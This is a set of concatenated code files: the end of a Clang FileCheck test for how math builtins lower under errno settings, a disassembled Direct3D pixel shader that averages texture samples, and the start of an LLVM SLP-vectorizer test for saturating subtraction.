// HAS_ERRNO: declare x86_fp80 @exp2l(x86_fp80) [[NOT_READNONE]]
__builtin_expm1(f); __builtin_expm1f(f); __builtin_expm1l(f);
// NO__ERRNO: declare double @expm1(double) [[READNONE]]
// NO__ERRNO: declare float @expm1f(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @expm1l(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @expm1(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @expm1f(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @expm1l(x86_fp80) [[NOT_READNONE]]
__builtin_fdim(f,f); __builtin_fdimf(f,f); __builtin_fdiml(f,f);
// NO__ERRNO: declare double @fdim(double, double) [[READNONE]]
// NO__ERRNO: declare float @fdimf(float, float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @fdiml(x86_fp80, x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @fdim(double, double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @fdimf(float, float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @fdiml(x86_fp80, x86_fp80) [[NOT_READNONE]]
__builtin_floor(f); __builtin_floorf(f); __builtin_floorl(f);
// NO__ERRNO: declare double @llvm.floor.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.floor.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.floor.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @llvm.floor.f64(double) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare float @llvm.floor.f32(float) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare x86_fp80 @llvm.floor.f80(x86_fp80) [[READNONE_INTRINSIC]]
__builtin_fma(f,f,f); __builtin_fmaf(f,f,f); __builtin_fmal(f,f,f);
// NO__ERRNO: declare double @llvm.fma.f64(double, double, double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.fma.f32(float, float, float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.fma.f80(x86_fp80, x86_fp80, x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @fma(double, double, double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @fmaf(float, float, float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @fmal(x86_fp80, x86_fp80, x86_fp80) [[NOT_READNONE]]
// On GNU or Win, fma never sets errno, so we can convert to the intrinsic.
// HAS_ERRNO_GNU: declare double @llvm.fma.f64(double, double, double) [[READNONE_INTRINSIC:#[0-9]+]]
// HAS_ERRNO_GNU: declare float @llvm.fma.f32(float, float, float) [[READNONE_INTRINSIC]]
// HAS_ERRNO_GNU: declare x86_fp80 @llvm.fma.f80(x86_fp80, x86_fp80, x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO_ANDROID: declare double @llvm.fma.f64(double, double, double) [[READNONE_INTRINSIC:#[0-9]+]]
// HAS_ERRNO_ANDROID: declare float @llvm.fma.f32(float, float, float) [[READNONE_INTRINSIC]]
// HAS_ERRNO_ANDROID: declare x86_fp80 @llvm.fma.f80(x86_fp80, x86_fp80, x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO_WIN: declare double @llvm.fma.f64(double, double, double) [[READNONE_INTRINSIC:#[0-9]+]]
// HAS_ERRNO_WIN: declare float @llvm.fma.f32(float, float, float) [[READNONE_INTRINSIC]]
// Long double is just double on win, so no f80 use/declaration.
// HAS_ERRNO_WIN-NOT: declare x86_fp80 @llvm.fma.f80(x86_fp80, x86_fp80, x86_fp80)
__builtin_fmax(f,f); __builtin_fmaxf(f,f); __builtin_fmaxl(f,f);
// NO__ERRNO: declare double @llvm.maxnum.f64(double, double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.maxnum.f32(float, float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.maxnum.f80(x86_fp80, x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @llvm.maxnum.f64(double, double) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare float @llvm.maxnum.f32(float, float) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare x86_fp80 @llvm.maxnum.f80(x86_fp80, x86_fp80) [[READNONE_INTRINSIC]]
__builtin_fmin(f,f); __builtin_fminf(f,f); __builtin_fminl(f,f);
// NO__ERRNO: declare double @llvm.minnum.f64(double, double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.minnum.f32(float, float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.minnum.f80(x86_fp80, x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @llvm.minnum.f64(double, double) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare float @llvm.minnum.f32(float, float) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare x86_fp80 @llvm.minnum.f80(x86_fp80, x86_fp80) [[READNONE_INTRINSIC]]
__builtin_hypot(f,f); __builtin_hypotf(f,f); __builtin_hypotl(f,f);
// NO__ERRNO: declare double @hypot(double, double) [[READNONE]]
// NO__ERRNO: declare float @hypotf(float, float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @hypotl(x86_fp80, x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @hypot(double, double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @hypotf(float, float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @hypotl(x86_fp80, x86_fp80) [[NOT_READNONE]]
__builtin_ilogb(f); __builtin_ilogbf(f); __builtin_ilogbl(f);
// NO__ERRNO: declare i32 @ilogb(double) [[READNONE]]
// NO__ERRNO: declare i32 @ilogbf(float) [[READNONE]]
// NO__ERRNO: declare i32 @ilogbl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare i32 @ilogb(double) [[NOT_READNONE]]
// HAS_ERRNO: declare i32 @ilogbf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare i32 @ilogbl(x86_fp80) [[NOT_READNONE]]
__builtin_lgamma(f); __builtin_lgammaf(f); __builtin_lgammal(f);
// NO__ERRNO: declare double @lgamma(double) [[NOT_READNONE]]
// NO__ERRNO: declare float @lgammaf(float) [[NOT_READNONE]]
// NO__ERRNO: declare x86_fp80 @lgammal(x86_fp80) [[NOT_READNONE]]
// HAS_ERRNO: declare double @lgamma(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @lgammaf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @lgammal(x86_fp80) [[NOT_READNONE]]
__builtin_llrint(f); __builtin_llrintf(f); __builtin_llrintl(f);
// NO__ERRNO: declare i64 @llvm.llrint.i64.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare i64 @llvm.llrint.i64.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare i64 @llvm.llrint.i64.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare i64 @llrint(double) [[NOT_READNONE]]
// HAS_ERRNO: declare i64 @llrintf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare i64 @llrintl(x86_fp80) [[NOT_READNONE]]
__builtin_llround(f); __builtin_llroundf(f); __builtin_llroundl(f);
// NO__ERRNO: declare i64 @llvm.llround.i64.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare i64 @llvm.llround.i64.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare i64 @llvm.llround.i64.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare i64 @llround(double) [[NOT_READNONE]]
// HAS_ERRNO: declare i64 @llroundf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare i64 @llroundl(x86_fp80) [[NOT_READNONE]]
__builtin_log(f); __builtin_logf(f); __builtin_logl(f);
// NO__ERRNO: declare double @llvm.log.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.log.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.log.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @log(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @logf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @logl(x86_fp80) [[NOT_READNONE]]
__builtin_log10(f); __builtin_log10f(f); __builtin_log10l(f);
// NO__ERRNO: declare double @llvm.log10.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.log10.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.log10.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @log10(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @log10f(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @log10l(x86_fp80) [[NOT_READNONE]]
__builtin_log1p(f); __builtin_log1pf(f); __builtin_log1pl(f);
// NO__ERRNO: declare double @log1p(double) [[READNONE]]
// NO__ERRNO: declare float @log1pf(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @log1pl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @log1p(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @log1pf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @log1pl(x86_fp80) [[NOT_READNONE]]
__builtin_log2(f); __builtin_log2f(f); __builtin_log2l(f);
// NO__ERRNO: declare double @llvm.log2.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.log2.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.log2.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @log2(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @log2f(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @log2l(x86_fp80) [[NOT_READNONE]]
__builtin_logb(f); __builtin_logbf(f); __builtin_logbl(f);
// NO__ERRNO: declare double @logb(double) [[READNONE]]
// NO__ERRNO: declare float @logbf(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @logbl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @logb(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @logbf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @logbl(x86_fp80) [[NOT_READNONE]]
__builtin_lrint(f); __builtin_lrintf(f); __builtin_lrintl(f);
// NO__ERRNO: declare i64 @llvm.lrint.i64.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare i64 @llvm.lrint.i64.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare i64 @llvm.lrint.i64.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare i64 @lrint(double) [[NOT_READNONE]]
// HAS_ERRNO: declare i64 @lrintf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare i64 @lrintl(x86_fp80) [[NOT_READNONE]]
__builtin_lround(f); __builtin_lroundf(f); __builtin_lroundl(f);
// NO__ERRNO: declare i64 @llvm.lround.i64.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare i64 @llvm.lround.i64.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare i64 @llvm.lround.i64.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare i64 @lround(double) [[NOT_READNONE]]
// HAS_ERRNO: declare i64 @lroundf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare i64 @lroundl(x86_fp80) [[NOT_READNONE]]
__builtin_nearbyint(f); __builtin_nearbyintf(f); __builtin_nearbyintl(f);
// NO__ERRNO: declare double @llvm.nearbyint.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.nearbyint.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.nearbyint.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @llvm.nearbyint.f64(double) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare float @llvm.nearbyint.f32(float) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare x86_fp80 @llvm.nearbyint.f80(x86_fp80) [[READNONE_INTRINSIC]]
__builtin_nextafter(f,f); __builtin_nextafterf(f,f); __builtin_nextafterl(f,f);
// NO__ERRNO: declare double @nextafter(double, double) [[READNONE]]
// NO__ERRNO: declare float @nextafterf(float, float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @nextafterl(x86_fp80, x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @nextafter(double, double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @nextafterf(float, float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @nextafterl(x86_fp80, x86_fp80) [[NOT_READNONE]]
__builtin_nexttoward(f,f); __builtin_nexttowardf(f,f);__builtin_nexttowardl(f,f);
// NO__ERRNO: declare double @nexttoward(double, x86_fp80) [[READNONE]]
// NO__ERRNO: declare float @nexttowardf(float, x86_fp80) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @nexttowardl(x86_fp80, x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @nexttoward(double, x86_fp80) [[NOT_READNONE]]
// HAS_ERRNO: declare float @nexttowardf(float, x86_fp80) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @nexttowardl(x86_fp80, x86_fp80) [[NOT_READNONE]]
__builtin_remainder(f,f); __builtin_remainderf(f,f); __builtin_remainderl(f,f);
// NO__ERRNO: declare double @remainder(double, double) [[READNONE]]
// NO__ERRNO: declare float @remainderf(float, float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @remainderl(x86_fp80, x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @remainder(double, double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @remainderf(float, float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @remainderl(x86_fp80, x86_fp80) [[NOT_READNONE]]
__builtin_remquo(f,f,i); __builtin_remquof(f,f,i); __builtin_remquol(f,f,i);
// NO__ERRNO: declare double @remquo(double, double, i32*) [[NOT_READNONE]]
// NO__ERRNO: declare float @remquof(float, float, i32*) [[NOT_READNONE]]
// NO__ERRNO: declare x86_fp80 @remquol(x86_fp80, x86_fp80, i32*) [[NOT_READNONE]]
// HAS_ERRNO: declare double @remquo(double, double, i32*) [[NOT_READNONE]]
// HAS_ERRNO: declare float @remquof(float, float, i32*) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @remquol(x86_fp80, x86_fp80, i32*) [[NOT_READNONE]]
__builtin_rint(f); __builtin_rintf(f); __builtin_rintl(f);
// NO__ERRNO: declare double @llvm.rint.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.rint.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.rint.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @llvm.rint.f64(double) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare float @llvm.rint.f32(float) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare x86_fp80 @llvm.rint.f80(x86_fp80) [[READNONE_INTRINSIC]]
__builtin_round(f); __builtin_roundf(f); __builtin_roundl(f);
// NO__ERRNO: declare double @llvm.round.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.round.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.round.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @llvm.round.f64(double) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare float @llvm.round.f32(float) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare x86_fp80 @llvm.round.f80(x86_fp80) [[READNONE_INTRINSIC]]
__builtin_scalbln(f,f); __builtin_scalblnf(f,f); __builtin_scalblnl(f,f);
// NO__ERRNO: declare double @scalbln(double, i64) [[READNONE]]
// NO__ERRNO: declare float @scalblnf(float, i64) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @scalblnl(x86_fp80, i64) [[READNONE]]
// HAS_ERRNO: declare double @scalbln(double, i64) [[NOT_READNONE]]
// HAS_ERRNO: declare float @scalblnf(float, i64) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @scalblnl(x86_fp80, i64) [[NOT_READNONE]]
__builtin_scalbn(f,f); __builtin_scalbnf(f,f); __builtin_scalbnl(f,f);
// NO__ERRNO: declare double @scalbn(double, i32) [[READNONE]]
// NO__ERRNO: declare float @scalbnf(float, i32) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @scalbnl(x86_fp80, i32) [[READNONE]]
// HAS_ERRNO: declare double @scalbn(double, i32) [[NOT_READNONE]]
// HAS_ERRNO: declare float @scalbnf(float, i32) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @scalbnl(x86_fp80, i32) [[NOT_READNONE]]
__builtin_sin(f); __builtin_sinf(f); __builtin_sinl(f);
// NO__ERRNO: declare double @llvm.sin.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.sin.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.sin.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @sin(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @sinf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @sinl(x86_fp80) [[NOT_READNONE]]
__builtin_sinh(f); __builtin_sinhf(f); __builtin_sinhl(f);
// NO__ERRNO: declare double @sinh(double) [[READNONE]]
// NO__ERRNO: declare float @sinhf(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @sinhl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @sinh(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @sinhf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @sinhl(x86_fp80) [[NOT_READNONE]]
__builtin_sqrt(f); __builtin_sqrtf(f); __builtin_sqrtl(f);
// NO__ERRNO: declare double @llvm.sqrt.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.sqrt.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.sqrt.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @sqrt(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @sqrtf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @sqrtl(x86_fp80) [[NOT_READNONE]]
__builtin_tan(f); __builtin_tanf(f); __builtin_tanl(f);
// NO__ERRNO: declare double @tan(double) [[READNONE]]
// NO__ERRNO: declare float @tanf(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @tanl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @tan(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @tanf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @tanl(x86_fp80) [[NOT_READNONE]]
__builtin_tanh(f); __builtin_tanhf(f); __builtin_tanhl(f);
// NO__ERRNO: declare double @tanh(double) [[READNONE]]
// NO__ERRNO: declare float @tanhf(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @tanhl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @tanh(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @tanhf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @tanhl(x86_fp80) [[NOT_READNONE]]
__builtin_tgamma(f); __builtin_tgammaf(f); __builtin_tgammal(f);
// NO__ERRNO: declare double @tgamma(double) [[READNONE]]
// NO__ERRNO: declare float @tgammaf(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @tgammal(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @tgamma(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @tgammaf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @tgammal(x86_fp80) [[NOT_READNONE]]
__builtin_trunc(f); __builtin_truncf(f); __builtin_truncl(f);
// NO__ERRNO: declare double @llvm.trunc.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.trunc.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.trunc.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @llvm.trunc.f64(double) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare float @llvm.trunc.f32(float) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare x86_fp80 @llvm.trunc.f80(x86_fp80) [[READNONE_INTRINSIC]]
};
// NO__ERRNO: attributes [[READNONE]] = { {{.*}}readnone{{.*}} }
// NO__ERRNO: attributes [[READNONE_INTRINSIC]] = { {{.*}}readnone{{.*}} }
// NO__ERRNO: attributes [[NOT_READNONE]] = { nounwind "correctly{{.*}} }
// NO__ERRNO: attributes [[PURE]] = { {{.*}}readonly{{.*}} }
// HAS_ERRNO: attributes [[NOT_READNONE]] = { nounwind "correctly{{.*}} }
// HAS_ERRNO: attributes [[READNONE_INTRINSIC]] = { {{.*}}readnone{{.*}} }
// HAS_ERRNO: attributes [[PURE]] = { {{.*}}readonly{{.*}} }
// HAS_ERRNO: attributes [[READNONE]] = { {{.*}}readnone{{.*}} }
// HAS_ERRNO_GNU: attributes [[READNONE_INTRINSIC]] = { {{.*}}readnone{{.*}} }
// HAS_ERRNO_ANDROID: attributes [[READNONE_INTRINSIC]] = { {{.*}}readnone{{.*}} }
// HAS_ERRNO_WIN: attributes [[READNONE_INTRINSIC]] = { {{.*}}readnone{{.*}} }
| {
"language": "Assembly"
} |
//
// Generated by Microsoft (R) D3D Shader Disassembler
//
//
// Input signature:
//
// Name Index Mask Register SysValue Format Used
// -------------------- ----- ------ -------- -------- ------- ------
// SV_POSITION 0 xyzw 0 POS float
// TEXCOORD 0 xy 1 NONE float xy
//
//
// Output signature:
//
// Name Index Mask Register SysValue Format Used
// -------------------- ----- ------ -------- -------- ------- ------
// SV_Target 0 xyzw 0 TARGET float xyzw
//
ps_5_0
dcl_globalFlags refactoringAllowed
dcl_constantbuffer cb0[1], immediateIndexed
dcl_sampler s0, mode_default
dcl_resource_texture2d (float,float,float,float) t0
dcl_input_ps linear v1.xy
dcl_output o0.xyzw
dcl_temps 2
mov r0.x, l(0)
mov r0.zw, l(0,0,0,0)
mov r1.x, cb0[0].z
loop
ilt r1.y, cb0[0].w, r1.x
breakc_nz r1.y
itof r1.y, r1.x
mul r0.y, r1.y, cb0[0].y
add r1.yz, r0.xxyx, v1.xxyx
sample_indexable(texture2d)(float,float,float,float) r1.yz, r1.yzyy, t0.zxyw, s0
add r0.zw, r0.zzzw, r1.yyyz
iadd r1.x, r1.x, l(1)
endloop
iadd r0.x, -cb0[0].z, cb0[0].w
itof r0.x, r0.x
add r0.x, r0.x, l(1.000000)
div o0.xy, r0.zwzz, r0.xxxx
mov o0.zw, l(0,0,0,0)
ret
// Approximately 0 instruction slots used
| {
"language": "Assembly"
} |
; NOTE: Assertions have been autogenerated by utils/update_test_checks.py
; RUN: opt < %s -mtriple=x86_64-unknown -basicaa -slp-vectorizer -S | FileCheck %s --check-prefixes=CHECK,SSE
; RUN: opt < %s -mtriple=x86_64-unknown -mcpu=slm -basicaa -slp-vectorizer -S | FileCheck %s --check-prefixes=CHECK,SLM
; RUN: opt < %s -mtriple=x86_64-unknown -mcpu=corei7-avx -basicaa -slp-vectorizer -S | FileCheck %s --check-prefixes=CHECK,AVX,AVX1
; RUN: opt < %s -mtriple=x86_64-unknown -mcpu=core-avx2 -basicaa -slp-vectorizer -S | FileCheck %s --check-prefixes=CHECK,AVX,AVX2
; RUN: opt < %s -mtriple=x86_64-unknown -mcpu=knl -basicaa -slp-vectorizer -S | FileCheck %s --check-prefixes=CHECK,AVX512,AVX512F
; RUN: opt < %s -mtriple=x86_64-unknown -mcpu=skx -mattr=-prefer-256-bit -basicaa -slp-vectorizer -S | FileCheck %s --check-prefixes=CHECK,AVX512,AVX512BW
; RUN: opt < %s -mtriple=x86_64-unknown -mcpu=skx -mattr=+prefer-256-bit -basicaa -slp-vectorizer -S | FileCheck %s --check-prefixes=CHECK,AVX,AVX256BW
@a64 = common global [8 x i64] zeroinitializer, align 64
@b64 = common global [8 x i64] zeroinitializer, align 64
@c64 = common global [8 x i64] zeroinitializer, align 64
@a32 = common global [16 x i32] zeroinitializer, align 64
@b32 = common global [16 x i32] zeroinitializer, align 64
@c32 = common global [16 x i32] zeroinitializer, align 64
@a16 = common global [32 x i16] zeroinitializer, align 64
@b16 = common global [32 x i16] zeroinitializer, align 64
@c16 = common global [32 x i16] zeroinitializer, align 64
@a8 = common global [64 x i8] zeroinitializer, align 64
@b8 = common global [64 x i8] zeroinitializer, align 64
@c8 = common global [64 x i8] zeroinitializer, align 64
declare i64 @llvm.ssub.sat.i64(i64, i64)
declare i32 @llvm.ssub.sat.i32(i32, i32)
declare i16 @llvm.ssub.sat.i16(i16, i16)
declare i8 @llvm.ssub.sat.i8 (i8 , i8 )
define void @sub_v8i64() {
; SSE-LABEL: @sub_v8i64(
; SSE-NEXT: [[A0:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 0), align 8
; SSE-NEXT: [[A1:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 1), align 8
; SSE-NEXT: [[A2:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 2), align 8
; SSE-NEXT: [[A3:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 3), align 8
; SSE-NEXT: [[A4:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 4), align 8
; SSE-NEXT: [[A5:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 5), align 8
; SSE-NEXT: [[A6:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 6), align 8
; SSE-NEXT: [[A7:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 7), align 8
; SSE-NEXT: [[B0:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 0), align 8
; SSE-NEXT: [[B1:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 1), align 8
; SSE-NEXT: [[B2:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 2), align 8
; SSE-NEXT: [[B3:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 3), align 8
; SSE-NEXT: [[B4:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 4), align 8
; SSE-NEXT: [[B5:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 5), align 8
; SSE-NEXT: [[B6:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 6), align 8
; SSE-NEXT: [[B7:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 7), align 8
; SSE-NEXT: [[R0:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A0]], i64 [[B0]])
; SSE-NEXT: [[R1:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A1]], i64 [[B1]])
; SSE-NEXT: [[R2:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A2]], i64 [[B2]])
; SSE-NEXT: [[R3:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A3]], i64 [[B3]])
; SSE-NEXT: [[R4:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A4]], i64 [[B4]])
; SSE-NEXT: [[R5:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A5]], i64 [[B5]])
; SSE-NEXT: [[R6:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A6]], i64 [[B6]])
; SSE-NEXT: [[R7:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A7]], i64 [[B7]])
; SSE-NEXT: store i64 [[R0]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 0), align 8
; SSE-NEXT: store i64 [[R1]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 1), align 8
; SSE-NEXT: store i64 [[R2]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 2), align 8
; SSE-NEXT: store i64 [[R3]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 3), align 8
; SSE-NEXT: store i64 [[R4]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 4), align 8
; SSE-NEXT: store i64 [[R5]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 5), align 8
; SSE-NEXT: store i64 [[R6]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 6), align 8
; SSE-NEXT: store i64 [[R7]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 7), align 8
; SSE-NEXT: ret void
;
; SLM-LABEL: @sub_v8i64(
